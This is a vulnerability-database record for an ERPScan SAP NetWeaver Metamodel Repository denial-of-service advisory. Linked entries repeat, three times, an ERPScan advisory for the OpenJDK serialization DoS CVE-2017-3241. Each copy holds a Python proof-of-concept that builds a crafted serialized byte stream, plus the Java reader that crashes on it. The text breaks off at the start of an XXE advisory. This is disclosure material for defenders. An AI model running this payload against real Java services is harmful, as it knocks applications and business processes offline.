ID ERPSCAN-10-006 Type erpscan Reporter ERPScan Modified 2010-02-15T00:00:00
Description
Application: SAP NetWeaver Versions Affected: SAP NetWeaver 7.0 metamodel repository Vendor URL: <http://sap.com> Bugs: Denial of service Exploits: YES Reported: 15.02.2010 Vendor response: 15.02.2010 Date of Public Advisory: 09.11.2010 Author: Alexandr Polyakov
Description
SAP Netweaver Metamodel Repository can be accessed without authentication by default in the old versions of SAP ECC.
Business Risk
A remote attacker can send a malicious packet to SAP NetWeaver server via the Internet or inside a company and conduct a denial of service attack by resource exhaustion. This will stop server and all business processes running on it. It can lead to monetary and reputation loss.
{"type": "erpscan", "published": "2010-02-15T00:00:00", "href": "https://erpscan.io/advisories/erpscan-10-006-sap-netweaver-mmr-denail-of-service/", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:7756C14129260F0F8D9820A2A1AD8A02"]}, {"type": "exploitdb", "idList": ["EDB-ID:41145"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140680"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32257"]}], "modified": "2020-09-15T10:41:39", "rev": 2}, "score": {"value": 3.7, "vector": "NONE", "modified": "2020-09-15T10:41:39", "rev": 2}, "vulnersScore": 3.7}, "lastseen": "2020-09-15T10:41:39", "viewCount": 2, "id": "ERPSCAN-10-006", "references": [], "edition": 4, "reporter": "ERPScan", "modified": "2010-02-15T00:00:00", "title": "SAP NetWeaver MMR \u2014 Denail of Service", "description": "**Application:** SAP NetWeaver \n**Versions Affected:** SAP NetWeaver 7.0 metamodel repository \n**Vendor URL:** <http://sap.com> \n**Bugs:** Denial of service \n**Exploits:** YES \n**Reported:** 15.02.2010 \n**Vendor response:** 15.02.2010 \n**Date of Public Advisory:** 09.11.2010 \n**Author:** Alexandr Polyakov\n\n**Description** \nSAP Netweaver Metamodel Repository can be accessed without authentication by default in the old versions of SAP ECC.\n\n**Business Risk** \nA remote attacker can send a malicious packet to SAP NetWeaver server via the Internet or inside a company and conduct a denial of service attack by resource exhaustion. This will stop server and all business processes running on it. It can lead to monetary and reputation loss.\n", "scheme": null}
{"packetstorm": [{"lastseen": "2017-01-23T19:04:23", "description": "", "published": "2017-01-23T00:00:00", "type": "packetstorm", "title": "Oracle OpenJDK Runtime Environment Build 1.8.0_112-b15 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3241"], "modified": "2017-01-23T00:00:00", "id": "PACKETSTORM:140680", "href": "https://packetstormsecurity.com/files/140680/Oracle-OpenJDK-Runtime-Environment-Build-1.8.0_112-b15-Denial-Of-Service.html", "sourceData": "`Application: Java SE \n \nVendor: Oracle \n \nBug: DoS \n \nReported: 23.12.2016 \n \nVendor response: 24.12.2016 \n \nDate of Public Advisory: 17.01.2017 \n \nReference: Oracle CPU Jan 2017 \n \nAuthor: Roman Shalymov \n \n \n \n1. ADVISORY INFORMATION \n \nTitle: Oracle OpenJDK - Java Serialization DoS \n \nAdvisory ID: [ERPSCAN-17-006] \n \nRisk: High \n \nAdvisory URL: \nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ \n \nDate published: 17.01.2017 \n \nVendor contacted: Oracle \n \n \n2. VULNERABILITY INFORMATION \n \n \nClass: Denial of Service \n \nRemotely Exploitable: Yes \n \nLocally Exploitable: Yes \n \nCVE Name: CVE-2017-3241 \n \nCVSS Base Score: 9.0 \n \n \n3. VULNERABILITY DESCRIPTION \n \n \nAn attacker can cause DoS of the application which uses OpenJDK Runtime \nEnvironment 1.8 as its core runtime engine. \n \n \n4. VULNERABLE PACKAGES \n \n \nOpenJDK Runtime Environment build 1.8.0_112-b15 \n \n \n5. SOLUTIONS AND WORKAROUNDS \n \n \nFix ObjectInputStream.skipCustomData() method, namely readObject0(false); \ncall in switch statement \n \nAdress Oracle CPU January 2017 \n \n6. AUTHOR \n \n \nRoman Shalymov (@shalymov) \n \n \n7. TECHNICAL DESCRIPTION \n \n \nAn attacker can craft a malicious sequence of bytes that will cause JVM \nStackOverflowError in the standard Java deserialization process if it uses \nObjectInputStream.readObject() method. \n \n \n \n7.1. Proof of Concept \n \n \n \nAn attacker creates a malicious sequence of bytes, for example, using this \npython script pwn_ser.py: \n \n \n \n#!/usr/bin/env python2 \n \n \n \nimport sys \n \n \n \nexp = \"\" \n \n#serialization header \n \nexp += '\\xac\\xed\\x00\\x05' \n \n \n \nexp1 = '' \n \nexp1 += '\\x72' \n \nexp1 += '\\x00\\x0c'+'java.io.File' \n \nexp1 += '\\x41'*8 \n \nexp1 += '\\x00' \n \nexp1 += '\\x00\\x00' \n \n \n \nexp += exp1 * 10000 \n \n \n \nsys.stdout.write(exp) \n \n \n \nand save it in exp2.ser file \n \n \n \n$ ./pwn_ser2.py > exp2.ser \n \n \n \nLet's simulate deserialization process. For this purpose, we create a \nsimple Java program, which uses the following standard deserialization \npattern: \n \n \n \nSerialize_read.java \n \n \n \nimport java.io.FileInputStream; \n \nimport java.io.ObjectInputStream; \n \n \n \npublic class Serialize_read { \n \n \n \npublic static void main(String args[]) throws Exception { \n \n \n \nif(args.length < 1) { \n \nSystem.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\" \n[file]\"); \n \nSystem.exit(-1); \n \n} \n \n \n \nFileInputStream fin = new FileInputStream(args[0]); \n \nObjectInputStream oin = new ObjectInputStream(fin); \n \n \n \ntry { \n \nObject objFromDisk = oin.readObject(); \n \nString s = (String)objFromDisk; \n \nSystem.out.println(s); \n \nSystem.out.println(\"Successfully read!\"); \n \n}catch(Exception e){} \n \nSystem.exit(0); \n \n \n \n} \n \n \n \n} \n \n \n \nLet's try to read our malicious file (we can also simulate this stuff over \nnetwork communication): \n \n \n \n$ javac Serialize_read.java \n \n$ java Serialize_read exp2.ser \n \n \n \nIt causes the following error dump: \n \n \n \nException in thread \"main\" java.lang.StackOverflowError \n \nat \njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351) \n \nat \njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834) \n \nat \njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892) \n \nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075) \n \nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684) \n \nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \n \n \n... \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340) \n \nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984) \n \nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628) \n \nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521) \n \n \n \n8. REPORT TIMELINE \n \nReported: 23.12.2016 \n \nVendor response: 24.12.2016 \n \nDate of Public Advisory: 17.01.2017 \n \n9. REFERENCES \nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html \nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/ \n \n \n10. ABOUT ERPScan Research \n \nERPScan research team specializes in vulnerability research and analysis of \ncritical enterprise applications. It was acknowledged multiple times by the \nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for \ndiscovering more than 400 vulnerabilities in their solutions (200 of them \njust in SAP!). \n \nERPScan researchers are proud of discovering new types of vulnerabilities \n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\" \nnomination at BlackHat 2013. \n \nERPScan experts participated as speakers, presenters, and trainers at 60+ \nprime international security conferences in 25+ countries across the \ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for \nseveral Fortune 2000 companies. \n \nERPScan researchers carry out the EAS-SEC project that is focused on \nenterprise application security awareness by issuing annual SAP security \nresearches. \n \nERPScan experts were interviewed in specialized info-sec resources and \nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC \nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. \n \nOur team consists of highly-qualified researchers, specialized in various \nfields of cybersecurity (from web application to ICS/SCADA systems), \ngathering their experience to conduct the best SAP security research. \n \n11. ABOUT ERPScan \n \nERPScan is the most respected and credible Business Application \nCybersecurity provider. Founded in 2010, the company operates globally and \nenables large Oil and Gas, Financial, Retail and other organizations to \nsecure their mission-critical processes. Named as an aEmerging Vendora in \nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and \ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in \ndiscovering and resolving security vulnerabilities. ERPScan consultants \nwork with SAP SE in Walldorf to assist in improving the security of their \nlatest solutions. \n \nERPScanas primary mission is to close the gap between technical and \nbusiness security, and provide solutions for CISO's to evaluate and secure \nSAP and Oracle ERP systems and business-critical applications from both \ncyberattacks and internal fraud. As a rule, our clients are large \nenterprises, Fortune 2000 companies and MSPs, whose requirements are to \nactively monitor and manage security of vast SAP and Oracle landscapes on a \nglobal scale. \n \nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam, \nto provide threat intelligence services, continuous support and to operate \nlocal offices and partner network spanning 20+ countries around the globe. \n \n \n \nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 \n \nPhone: 650.798.5255 \n \nTwitter: @erpscan \n \nScoop-it: Business Application Security \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140680/ERPSCAN-17-006.txt"}], "exploitdb": [{"lastseen": "2017-01-23T20:59:34", "description": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service. CVE-2017-3241. Dos exploit for Multiple platform", "published": "2017-01-23T00:00:00", "type": "exploitdb", "title": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3241"], "modified": "2017-01-23T00:00:00", "id": "EDB-ID:41145", "href": "https://www.exploit-db.com/exploits/41145/", "sourceData": "'''\r\nApplication: Java SE\r\n\r\nVendor: Oracle\r\n\r\nBug: DoS\r\n\r\nReported: 23.12.2016\r\n\r\nVendor response: 24.12.2016\r\n\r\nDate of Public Advisory: 17.01.2017\r\n\r\nReference: Oracle CPU Jan 2017\r\n\r\nAuthor: Roman Shalymov\r\n\r\n\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle OpenJDK - Java Serialization DoS\r\n\r\nAdvisory ID: [ERPSCAN-17-006]\r\n\r\nRisk: High\r\n\r\nAdvisory URL:\r\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\r\n\r\nDate published: 17.01.2017\r\n\r\nVendor contacted: Oracle\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\n\r\nClass: Denial of Service\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nCVE Name: CVE-2017-3241\r\n\r\nCVSS Base Score: 9.0\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n\r\nAn attacker can cause DoS of the application which uses OpenJDK Runtime\r\nEnvironment 1.8 as its core runtime engine.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\n\r\nOpenJDK Runtime Environment build 1.8.0_112-b15\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\n\r\nFix ObjectInputStream.skipCustomData() method, namely readObject0(false);\r\ncall in switch statement\r\n\r\nAdress Oracle CPU January 2017\r\n\r\n 6. AUTHOR\r\n\r\n\r\nRoman Shalymov (@shalymov)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\n\r\nAn attacker can craft a malicious sequence of bytes that will cause JVM\r\nStackOverflowError in the standard Java deserialization process if it uses\r\nObjectInputStream.readObject() method.\r\n\r\n\r\n7.1. Proof of Concept\r\n\r\nAn attacker creates a malicious sequence of bytes, for example, using this\r\npython script pwn_ser.py:\r\n\r\n'''\r\n#!/usr/bin/env python2\r\n\r\nimport sys\r\n\r\nexp = \"\"\r\n\r\n#serialization header\r\n\r\nexp += '\\xac\\xed\\x00\\x05'\r\n\r\nexp1 = ''\r\n\r\nexp1 += '\\x72'\r\n\r\nexp1 += '\\x00\\x0c'+'java.io.File'\r\n\r\nexp1 += '\\x41'*8\r\n\r\nexp1 += '\\x00'\r\n\r\nexp1 += '\\x00\\x00'\r\n\r\n\r\nexp += exp1 * 10000\r\n\r\nsys.stdout.write(exp)\r\n\r\n'''\r\nand save it in exp2.ser file\r\n\r\n\r\n$ ./pwn_ser2.py > exp2.ser\r\n\r\nLet's simulate deserialization process. For this purpose, we create a\r\nsimple Java program, which uses the following standard deserialization\r\npattern:\r\n\r\n\r\nSerialize_read.java\r\n\r\n\r\nimport java.io.FileInputStream;\r\n\r\nimport java.io.ObjectInputStream;\r\n\r\npublic class Serialize_read {\r\n\r\npublic static void main(String args[]) throws Exception {\r\n\r\n if(args.length < 1) {\r\n\r\n System.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\"\r\n[file]\");\r\n\r\n System.exit(-1);\r\n\r\n }\r\n\r\n FileInputStream fin = new FileInputStream(args[0]);\r\n\r\n ObjectInputStream oin = new ObjectInputStream(fin);\r\n\r\n try {\r\n\r\n Object objFromDisk = oin.readObject();\r\n\r\n String s = (String)objFromDisk;\r\n\r\n System.out.println(s);\r\n\r\n System.out.println(\"Successfully read!\");\r\n\r\n }catch(Exception e){}\r\n\r\n System.exit(0);\r\n\r\n}\r\n\r\n}\r\n\r\n\r\nLet's try to read our malicious file (we can also simulate this stuff over\r\nnetwork communication):\r\n\r\n$ javac Serialize_read.java\r\n\r\n$ java Serialize_read exp2.ser\r\n\r\nIt causes the following error dump:\r\n\r\nException in thread \"main\" java.lang.StackOverflowError\r\n\r\nat\r\njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)\r\n\r\nat\r\njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)\r\n\r\nat\r\njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)\r\n\r\nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)\r\n\r\nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)\r\n\r\nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\n...\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\r\n\r\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\r\n\r\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\r\n\r\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 23.12.2016\r\n\r\nVendor response: 24.12.2016\r\n\r\nDate of Public Advisory: 17.01.2017\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html\r\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nERPScan research team specializes in vulnerability research and analysis of\r\ncritical enterprise applications. It was acknowledged multiple times by the\r\nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for\r\ndiscovering more than 400 vulnerabilities in their solutions (200 of them\r\njust in SAP!).\r\n\r\nERPScan researchers are proud of discovering new types of vulnerabilities\r\n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\"\r\nnomination at BlackHat 2013.\r\n\r\nERPScan experts participated as speakers, presenters, and trainers at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for\r\nseveral Fortune 2000 companies.\r\n\r\nERPScan researchers carry out the EAS-SEC project that is focused on\r\nenterprise application security awareness by issuing annual SAP security\r\nresearches.\r\n\r\nERPScan experts were interviewed in specialized info-sec resources and\r\nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC\r\nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.\r\n\r\nOur team consists of highly-qualified researchers, specialized in various\r\nfields of cybersecurity (from web application to ICS/SCADA systems),\r\ngathering their experience to conduct the best SAP security research.\r\n\r\n11. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nCybersecurity provider. Founded in 2010, the company operates globally and\r\nenables large Oil and Gas, Financial, Retail and other organizations to\r\nsecure their mission-critical processes. Named as an aEmerging Vendora in\r\nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and\r\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan consultants\r\nwork with SAP SE in Walldorf to assist in improving the security of their\r\nlatest solutions.\r\n\r\nERPScanas primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions for CISO's to evaluate and secure\r\nSAP and Oracle ERP systems and business-critical applications from both\r\ncyberattacks and internal fraud. As a rule, our clients are large\r\nenterprises, Fortune 2000 companies and MSPs, whose requirements are to\r\nactively monitor and manage security of vast SAP and Oracle landscapes on a\r\nglobal scale.\r\n\r\nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam,\r\nto provide threat intelligence services, continuous support and to operate\r\nlocal offices and partner network spanning 20+ countries around the globe.\r\n\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\n\r\nPhone: 650.798.5255\r\n\r\nTwitter: @erpscan\r\n\r\nScoop-it: Business Application Security\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41145/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service", "edition": 1, "published": "2017-01-23T00:00:00", "title": "Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3241"], "modified": "2017-01-23T00:00:00", "id": "EXPLOITPACK:7756C14129260F0F8D9820A2A1AD8A02", "href": "", "sourceData": "'''\nApplication: Java SE\n\nVendor: Oracle\n\nBug: DoS\n\nReported: 23.12.2016\n\nVendor response: 24.12.2016\n\nDate of Public Advisory: 17.01.2017\n\nReference: Oracle CPU Jan 2017\n\nAuthor: Roman Shalymov\n\n\n\n1. ADVISORY INFORMATION\n\nTitle: Oracle OpenJDK - Java Serialization DoS\n\nAdvisory ID: [ERPSCAN-17-006]\n\nRisk: High\n\nAdvisory URL:\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\n\nDate published: 17.01.2017\n\nVendor contacted: Oracle\n\n\n2. VULNERABILITY INFORMATION\n\n\nClass: Denial of Service\n\nRemotely Exploitable: Yes\n\nLocally Exploitable: Yes\n\nCVE Name: CVE-2017-3241\n\nCVSS Base Score: 9.0\n\n\n3. VULNERABILITY DESCRIPTION\n\n\nAn attacker can cause DoS of the application which uses OpenJDK Runtime\nEnvironment 1.8 as its core runtime engine.\n\n\n4. VULNERABLE PACKAGES\n\n\nOpenJDK Runtime Environment build 1.8.0_112-b15\n\n\n5. SOLUTIONS AND WORKAROUNDS\n\n\nFix ObjectInputStream.skipCustomData() method, namely readObject0(false);\ncall in switch statement\n\nAdress Oracle CPU January 2017\n\n 6. AUTHOR\n\n\nRoman Shalymov (@shalymov)\n\n\n7. TECHNICAL DESCRIPTION\n\n\nAn attacker can craft a malicious sequence of bytes that will cause JVM\nStackOverflowError in the standard Java deserialization process if it uses\nObjectInputStream.readObject() method.\n\n\n7.1. Proof of Concept\n\nAn attacker creates a malicious sequence of bytes, for example, using this\npython script pwn_ser.py:\n\n'''\n#!/usr/bin/env python2\n\nimport sys\n\nexp = \"\"\n\n#serialization header\n\nexp += '\\xac\\xed\\x00\\x05'\n\nexp1 = ''\n\nexp1 += '\\x72'\n\nexp1 += '\\x00\\x0c'+'java.io.File'\n\nexp1 += '\\x41'*8\n\nexp1 += '\\x00'\n\nexp1 += '\\x00\\x00'\n\n\nexp += exp1 * 10000\n\nsys.stdout.write(exp)\n\n'''\nand save it in exp2.ser file\n\n\n$ ./pwn_ser2.py > exp2.ser\n\nLet's simulate deserialization process. For this purpose, we create a\nsimple Java program, which uses the following standard deserialization\npattern:\n\n\nSerialize_read.java\n\n\nimport java.io.FileInputStream;\n\nimport java.io.ObjectInputStream;\n\npublic class Serialize_read {\n\npublic static void main(String args[]) throws Exception {\n\n if(args.length < 1) {\n\n System.out.println(\"usage: \"+Serialize_read.class.getSimpleName()+\"\n[file]\");\n\n System.exit(-1);\n\n }\n\n FileInputStream fin = new FileInputStream(args[0]);\n\n ObjectInputStream oin = new ObjectInputStream(fin);\n\n try {\n\n Object objFromDisk = oin.readObject();\n\n String s = (String)objFromDisk;\n\n System.out.println(s);\n\n System.out.println(\"Successfully read!\");\n\n }catch(Exception e){}\n\n System.exit(0);\n\n}\n\n}\n\n\nLet's try to read our malicious file (we can also simulate this stuff over\nnetwork communication):\n\n$ javac Serialize_read.java\n\n$ java Serialize_read exp2.ser\n\nIt causes the following error dump:\n\nException in thread \"main\" java.lang.StackOverflowError\n\nat\njava.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)\n\nat\njava.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)\n\nat\njava.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)\n\nat java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)\n\nat java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)\n\nat java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\n...\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\nat java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)\n\nat java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)\n\nat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)\n\nat java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)\n\n\n8. REPORT TIMELINE\n\nReported: 23.12.2016\n\nVendor response: 24.12.2016\n\nDate of Public Advisory: 17.01.2017\n\n9. REFERENCES\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html\nhttps://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/\n\n\n10. ABOUT ERPScan Research\n\nERPScan research team specializes in vulnerability research and analysis of\ncritical enterprise applications. It was acknowledged multiple times by the\nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for\ndiscovering more than 400 vulnerabilities in their solutions (200 of them\njust in SAP!).\n\nERPScan researchers are proud of discovering new types of vulnerabilities\n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\"\nnomination at BlackHat 2013.\n\nERPScan experts participated as speakers, presenters, and trainers at 60+\nprime international security conferences in 25+ countries across the\ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for\nseveral Fortune 2000 companies.\n\nERPScan researchers carry out the EAS-SEC project that is focused on\nenterprise application security awareness by issuing annual SAP security\nresearches.\n\nERPScan experts were interviewed in specialized info-sec resources and\nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC\nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.\n\nOur team consists of highly-qualified researchers, specialized in various\nfields of cybersecurity (from web application to ICS/SCADA systems),\ngathering their experience to conduct the best SAP security research.\n\n11. ABOUT ERPScan\n\nERPScan is the most respected and credible Business Application\nCybersecurity provider. Founded in 2010, the company operates globally and\nenables large Oil and Gas, Financial, Retail and other organizations to\nsecure their mission-critical processes. Named as an aEmerging Vendora in\nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in\ndiscovering and resolving security vulnerabilities. ERPScan consultants\nwork with SAP SE in Walldorf to assist in improving the security of their\nlatest solutions.\n\nERPScanas primary mission is to close the gap between technical and\nbusiness security, and provide solutions for CISO's to evaluate and secure\nSAP and Oracle ERP systems and business-critical applications from both\ncyberattacks and internal fraud. As a rule, our clients are large\nenterprises, Fortune 2000 companies and MSPs, whose requirements are to\nactively monitor and manage security of vast SAP and Oracle landscapes on a\nglobal scale.\n\nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam,\nto provide threat intelligence services, continuous support and to operate\nlocal offices and partner network spanning 20+ countries around the globe.\n\n\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nPhone: 650.798.5255\n\nTwitter: @erpscan\n\nScoop-it: Business Application Security\n'''", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2811"], "description": "\r\nERPSCAN Research Advisory [ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE\r\n\r\n\r\nApplication: SAP NetWeaver Portal 7.31\r\nVersions Affected: SAP NetWeaver Portal 7.31, probably others\r\nVendor URL: http://SAP.com\r\nBugs: XXE\r\nSent: 09.12.2014\r\nReported: 09.12.2014\r\nVendor response: 10.12.2014\r\nDate of Public Advisory: 18.06.2015\r\nReference: SAP Security Note 2111939\r\nAuthor: Vahagn Vardanyan (ERPScan)\r\n\r\n\r\nDescription\r\n\r\n\r\n1. ADVISORY INFORMATION\r\nTitle: SAP NetWeaver Portal ReportXmlViewer - XXE\r\nAdvisory ID: [ERPSCAN-15-006]\r\nRisk: High\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-006-sap-netweaver-portal-reportxmlviewer-xxe/\r\nDate published: 15.03.2015\r\nVendors contacted: SAP\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\nClass: XXE [CWE-122]\r\nImpact: XML external entity, information disclosure, denial of service, role upload, thread reporting\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-2811\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\nBy default, the 